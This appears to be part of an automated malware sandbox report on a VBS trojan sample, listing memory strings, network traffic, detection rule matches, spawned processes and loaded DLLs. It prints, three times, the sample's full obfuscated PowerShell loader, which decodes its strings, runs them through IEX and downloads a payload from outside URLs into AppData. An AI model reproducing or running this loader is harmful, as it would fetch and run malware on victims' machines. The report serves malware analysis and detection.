            Source: powershell.exe, 00000003.00000002.1849596951.0000021A9AFD9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.ftsengineers.com
            Source: powershell.exe, 00000006.00000002.2988349216.000000000732E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
            Source: powershell.exe, 00000003.00000002.1849596951.0000021A991F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000006.00000002.2970700817.00000000046E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 00000006.00000002.2982475542.0000000005748000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000006.00000002.2982475542.0000000005748000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000006.00000002.2982475542.0000000005748000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000006.00000002.2970700817.0000000004835000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2968789365.0000000002CBE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000003.00000002.1849596951.0000021A9A66F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
            Source: powershell.exe, 00000003.00000002.1874103061.0000021AA9260000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2982475542.0000000005748000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000003.00000002.1849596951.0000021A99415000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1849596951.0000021A9AFD3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ftsengineers.com
            Source: powershell.exe, 00000003.00000002.1849596951.0000021A99415000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1849596951.0000021A9A66F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2970700817.0000000004835000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ftsengineers.com/km/microcheilia.dwp
            Source: powershell.exe, 00000003.00000002.1849596951.0000021A99415000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1849596951.0000021A9A66F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2970700817.0000000004835000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.puneet.ae/km/microcheilia.dwp
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknown | HTTPS traffic detected: 103.53.42.63:443 -> 192.168.2.4:49731 version: TLS 1.2

            System Summary

            Source: amsi32_6640.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 1732, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 6640, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Polars229='Afkvistning158';;$Navier='kompetencegivende';;$Ndudgangen9='semipreserved';;$Straalepletten='Knaldgassen';;$Forhales=$host.Name;function Tilbageholdte($Satirisation){If ($Forhales) {$Nonanarchically=2} for ($Jurywoman=$Nonanarchically;;$Jurywoman+=3){if(!$Satirisation[$Jurywoman]){cls;break }$Halomancy+=$Satirisation[$Jurywoman];$Hiveward='Schweizerostens'}$Halomancy}function Containeriseringers($Taltes213){ .($Murage) ($Taltes213)}$Plagen=Tilbageholdte ' SNRee gt c. Uw';$Plagen+=Tilbageholdte ' ae aB.lC.ulE i EeSiN at';$Moonscape=Tilbageholdte 'B,MCoo,tz,hi Sl,al Cao /';$elegiker=Tilbageholdte ' aT TlFlsto1Fo2';$Ungeneral='Ar[T.npuEM TM .BiSDuE rFeV ITrc oEPaP.poNaISunIstS.MRiAAmNBua nGHaESdr M]Kn:So:StsC eSeCFaU yr aI utA,y RpAlrMaoU t OKoCKootaL,u=Pe$ eEB.lS eFlg OiOmK BeBir';$Moonscape+=Tilbageholdte 'Mo5Gu. u0La G( LW viKrnT d oKawCosVi O.NHeTRe i1Ae0 r.Ap0Sl;st ,eW Si .nH 6Bo4Dr; u ,ix i6 H4O,;Ke Lur RvA :Pi1L 3Fo1Va.Bu0Ab) d ,GBae cDekHao /tr2Va0Re1E.0an0 M1As0Ne1 L TiFSei MrNeeSef CoDrx o/R 1Cy3 T1.o.So0';$Retransform=Tilbageholdte ' FUT sC,eTeris-skA ag,eeRen Ct';$Automatteoriens=Tilbageholdte 'RuhSath.tSpp jsE :Qu/ e/T w Tw OwKr. vfVitGasMae n gKriS nTreSte rL.sTr. Ac RoT.mF /RekSpmG./RemLyimecNarP.oHocOvhTheDri SlReiW a L.Sid Kw.rp Q> jh lt It.opEvsFo:hy/ e/N w CwSkwfu. opAfu bn eS.e itfa.Tra eesl/HykRumGa/ vmE,iHuc CrSmoG cDrh .e HiPalK iWaaC,. 
rd w op';$Sterne=Tilbageholdte 'Bi>';$Murage=Tilbageholdte 'BeiEaEFrX';$Svejsemestre='Teddybjrnenes';$Groteskes='\bethink.Sal';Containeriseringers (Tilbageholdte 'K.$FogUdl iO.eBRoA,mlk,:SeeCaN HERiB rrH rChi SCuEDiNAleH SSa=Af$ .EflnTrv I: Fa uPAnp D.eAMet aKr+S,$Kng cR,doK tRuE oSReK E.as');Containeriseringers (Tilbageholdte 'Sc$Ovg .LTho ,b EAVrlSa:VilUnA,nGRer CI.rn.pg SsArFBlO TRS M .3Re7Go=E $ .A.juFlt O oM hA eTLaT.oeThoc R PiSpeFoN rS A.KlsN pUnL ri STHo(Sl$PesJeT EArRG N yEMu)');Containeriseringers (Tilbageholdte $Ungeneral);$Automatteoriens=$Lagringsform37[0];$Bygders=(Tilbageholdte ' P$brgT lS O Sb.uAC L : PbAmIS,RSkGBoiSpTQuTH iHjN MERarFrE BnSks .=F.NFieF wSt-SmoPeBGyj BeHocK,T US.nyJoSStt GER M K.l $Sap DlBiaL.g eCoN');Containeriseringers ($Bygders);Containeriseringers (Tilbageholdte '.o$PrBPeiCorD gPri FtJ.t .i Sn heSorEreannKus i.OrHudeAraMid,eeRarKosCa[Po$StRHeeG.tSar Oa,inSrsShfK.oF rPrmS ]Fa=Gr$JeMSto EoOvnPas,dcKua gpSie');$Netmave=Tilbageholdte ' S$ .BGoiF.rReg,ai at Dt si ,nn e MrS eHjns,s . .DBooFlwB nudl OoLraPedcaFB itrlc e H(Dr$AaA au NtProUnmSeaMittotS eDioKor iReeAnnA,sri, $ VIHunMadDioIrpAth yeOrnUni CnEp)';$Indophenin=$Enebrrisenes;Containeriseringers (Tilbageholdte 'T $,nGM.lstOFeB cA.oL E:InI dnFuGGoET f MR DM iAB.RSpmCoEf LAfaB DGeE o= F(.yt Ee aSBat f-AtP,aa ,t ah i y$UnI KnChd .O ,pUnHUdE ,n Ki ,nBe)');while (!$Ingefrmarmelade) {Containeriseringers (Tilbageholdte ' e$ ig slBuoBrbSpa AlBl:M DfieDonNonLo
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD9BAAAB26
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD9BAAB8D2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_02DFEBA0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_02DFF470
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_02DFE858
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_06D50647
            Source: S1a5ZF3ytp.vbs | Initial sample: Strings found which are bigger than 50
            Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 4484
            Source: unknown | Process created: Commandline size = 4484
            Source: amsi32_6640.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 1732, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 6640, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engine | Classification label: mal100.troj.expl.evad.winVBS@9/9@2/1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\bethink.Sal
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6644:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3992:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2316:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ak3t1omf.bzo.ps1
            Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\S1a5ZF3ytp.vbs"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1732
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6640
            Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\S1a5ZF3ytp.vbs"
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumber
            Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Polars229='Afkvistning158';;$Navier='kompetencegivende';;$Ndudgangen9='semipreserved';;$Straalepletten='Knaldgassen';;$Forhales=$host.Name;function Tilbageholdte($Satirisation){If ($Forhales) {$Nonanarchically=2} for ($Jurywoman=$Nonanarchically;;$Jurywoman+=3){if(!$Satirisation[$Jurywoman]){cls;break }$Halomancy+=$Satirisation[$Jurywoman];$Hiveward='Schweizerostens'}$Halomancy}function Containeriseringers($Taltes213){ .($Murage) ($Taltes213)}$Plagen=Tilbageholdte ' SNRee gt c. Uw';$Plagen+=Tilbageholdte ' ae aB.lC.ulE i EeSiN at';$Moonscape=Tilbageholdte 'B,MCoo,tz,hi Sl,al Cao /';$elegiker=Tilbageholdte ' aT TlFlsto1Fo2';$Ungeneral='Ar[T.npuEM TM .BiSDuE rFeV ITrc oEPaP.poNaISunIstS.MRiAAmNBua nGHaESdr M]Kn:So:StsC eSeCFaU yr aI utA,y RpAlrMaoU t OKoCKootaL,u=Pe$ eEB.lS eFlg OiOmK BeBir';$Moonscape+=Tilbageholdte 'Mo5Gu. u0La G( LW viKrnT d oKawCosVi O.NHeTRe i1Ae0 r.Ap0Sl;st ,eW Si .nH 6Bo4Dr; u ,ix i6 H4O,;Ke Lur RvA :Pi1L 3Fo1Va.Bu0Ab) d ,GBae cDekHao /tr2Va0Re1E.0an0 M1As0Ne1 L TiFSei MrNeeSef CoDrx o/R 1Cy3 T1.o.So0';$Retransform=Tilbageholdte ' FUT sC,eTeris-skA ag,eeRen Ct';$Automatteoriens=Tilbageholdte 'RuhSath.tSpp jsE :Qu/ e/T w Tw OwKr. vfVitGasMae n gKriS nTreSte rL.sTr. Ac RoT.mF /RekSpmG./RemLyimecNarP.oHocOvhTheDri SlReiW a L.Sid Kw.rp Q> jh lt It.opEvsFo:hy/ e/N w CwSkwfu. opAfu bn eS.e itfa.Tra eesl/HykRumGa/ vmE,iHuc CrSmoG cDrh .e HiPalK iWaaC,. 
rd w op';$Sterne=Tilbageholdte 'Bi>';$Murage=Tilbageholdte 'BeiEaEFrX';$Svejsemestre='Teddybjrnenes';$Groteskes='\bethink.Sal';Containeriseringers (Tilbageholdte 'K.$FogUdl iO.eBRoA,mlk,:SeeCaN HERiB rrH rChi SCuEDiNAleH SSa=Af$ .EflnTrv I: Fa uPAnp D.eAMet aKr+S,$Kng cR,doK tRuE oSReK E.as');Containeriseringers (Tilbageholdte 'Sc$Ovg .LTho ,b EAVrlSa:VilUnA,nGRer CI.rn.pg SsArFBlO TRS M .3Re7Go=E $ .A.juFlt O oM hA eTLaT.oeThoc R PiSpeFoN rS A.KlsN pUnL ri STHo(Sl$PesJeT EArRG N yEMu)');Containeriseringers (Tilbageholdte $Ungeneral);$Automatteoriens=$Lagringsform37[0];$Bygders=(Tilbageholdte ' P$brgT lS O Sb.uAC L : PbAmIS,RSkGBoiSpTQuTH iHjN MERarFrE BnSks .=F.NFieF wSt-SmoPeBGyj BeHocK,T US.nyJoSStt GER M K.l $Sap DlBiaL.g eCoN');Containeriseringers ($Bygders);Containeriseringers (Tilbageholdte '.o$PrBPeiCorD gPri FtJ.t .i Sn heSorEreannKus i.OrHudeAraMid,eeRarKosCa[Po$StRHeeG.tSar Oa,inSrsShfK.oF rPrmS ]Fa=Gr$JeMSto EoOvnPas,dcKua gpSie');$Netmave=Tilbageholdte ' S$ .BGoiF.rReg,ai at Dt si ,nn e MrS eHjns,s . .DBooFlwB nudl OoLraPedcaFB itrlc e H(Dr$AaA au NtProUnmSeaMittotS eDioKor iReeAnnA,sri, $ VIHunMadDioIrpAth yeOrnUni CnEp)';$Indophenin=$Enebrrisenes;Containeriseringers (Tilbageholdte 'T $,nGM.lstOFeB cA.oL E:InI dnFuGGoET f MR DM iAB.RSpmCoEf LAfaB DGeE o= F(.yt Ee aSBat f-AtP,aa ,t ah i y$UnI KnChd .O ,pUnHUdE ,n Ki ,nBe)');while (!$Ingefrmarmelade) {Containeriseringers (Tilbageholdte ' e$ ig slBuoBrbSpa AlBl:M DfieDonNonLo
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Polars229='Afkvistning158';;$Navier='kompetencegivende';;$Ndudgangen9='semipreserved';;$Straalepletten='Knaldgassen';;$Forhales=$host.Name;function Tilbageholdte($Satirisation){If ($Forhales) {$Nonanarchically=2} for ($Jurywoman=$Nonanarchically;;$Jurywoman+=3){if(!$Satirisation[$Jurywoman]){cls;break }$Halomancy+=$Satirisation[$Jurywoman];$Hiveward='Schweizerostens'}$Halomancy}function Containeriseringers($Taltes213){ .($Murage) ($Taltes213)}$Plagen=Tilbageholdte ' SNRee gt c. Uw';$Plagen+=Tilbageholdte ' ae aB.lC.ulE i EeSiN at';$Moonscape=Tilbageholdte 'B,MCoo,tz,hi Sl,al Cao /';$elegiker=Tilbageholdte ' aT TlFlsto1Fo2';$Ungeneral='Ar[T.npuEM TM .BiSDuE rFeV ITrc oEPaP.poNaISunIstS.MRiAAmNBua nGHaESdr M]Kn:So:StsC eSeCFaU yr aI utA,y RpAlrMaoU t OKoCKootaL,u=Pe$ eEB.lS eFlg OiOmK BeBir';$Moonscape+=Tilbageholdte 'Mo5Gu. u0La G( LW viKrnT d oKawCosVi O.NHeTRe i1Ae0 r.Ap0Sl;st ,eW Si .nH 6Bo4Dr; u ,ix i6 H4O,;Ke Lur RvA :Pi1L 3Fo1Va.Bu0Ab) d ,GBae cDekHao /tr2Va0Re1E.0an0 M1As0Ne1 L TiFSei MrNeeSef CoDrx o/R 1Cy3 T1.o.So0';$Retransform=Tilbageholdte ' FUT sC,eTeris-skA ag,eeRen Ct';$Automatteoriens=Tilbageholdte 'RuhSath.tSpp jsE :Qu/ e/T w Tw OwKr. vfVitGasMae n gKriS nTreSte rL.sTr. Ac RoT.mF /RekSpmG./RemLyimecNarP.oHocOvhTheDri SlReiW a L.Sid Kw.rp Q> jh lt It.opEvsFo:hy/ e/N w CwSkwfu. opAfu bn eS.e itfa.Tra eesl/HykRumGa/ vmE,iHuc CrSmoG cDrh .e HiPalK iWaaC,. 
rd w op';$Sterne=Tilbageholdte 'Bi>';$Murage=Tilbageholdte 'BeiEaEFrX';$Svejsemestre='Teddybjrnenes';$Groteskes='\bethink.Sal';Containeriseringers (Tilbageholdte 'K.$FogUdl iO.eBRoA,mlk,:SeeCaN HERiB rrH rChi SCuEDiNAleH SSa=Af$ .EflnTrv I: Fa uPAnp D.eAMet aKr+S,$Kng cR,doK tRuE oSReK E.as');Containeriseringers (Tilbageholdte 'Sc$Ovg .LTho ,b EAVrlSa:VilUnA,nGRer CI.rn.pg SsArFBlO TRS M .3Re7Go=E $ .A.juFlt O oM hA eTLaT.oeThoc R PiSpeFoN rS A.KlsN pUnL ri STHo(Sl$PesJeT EArRG N yEMu)');Containeriseringers (Tilbageholdte $Ungeneral);$Automatteoriens=$Lagringsform37[0];$Bygders=(Tilbageholdte ' P$brgT lS O Sb.uAC L : PbAmIS,RSkGBoiSpTQuTH iHjN MERarFrE BnSks .=F.NFieF wSt-SmoPeBGyj BeHocK,T US.nyJoSStt GER M K.l $Sap DlBiaL.g eCoN');Containeriseringers ($Bygders);Containeriseringers (Tilbageholdte '.o$PrBPeiCorD gPri FtJ.t .i Sn heSorEreannKus i.OrHudeAraMid,eeRarKosCa[Po$StRHeeG.tSar Oa,inSrsShfK.oF rPrmS ]Fa=Gr$JeMSto EoOvnPas,dcKua gpSie');$Netmave=Tilbageholdte ' S$ .BGoiF.rReg,ai at Dt si ,nn e MrS eHjns,s . .DBooFlwB nudl OoLraPedcaFB itrlc e H(Dr$AaA au NtProUnmSeaMittotS eDioKor iReeAnnA,sri, $ VIHunMadDioIrpAth yeOrnUni CnEp)';$Indophenin=$Enebrrisenes;Containeriseringers (Tilbageholdte 'T $,nGM.lstOFeB cA.oL E:InI dnFuGGoET f MR DM iAB.RSpmCoEf LAfaB DGeE o= F(.yt Ee aSBat f-AtP,aa ,t ah i y$UnI KnChd .O ,pUnHUdE ,n Ki ,nBe)');while (!$Ingefrmarmelade) {Containeriseringers (Tilbageholdte ' e$ ig slBuoBrbSpa AlBl:M DfieDonNonLo
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: cryptnet.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: webio.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: cabinet.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: firewallapi.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: fwbase.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: fwpolicyiomgr.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
            Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
            Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
            Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
            Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
            Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sxs.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
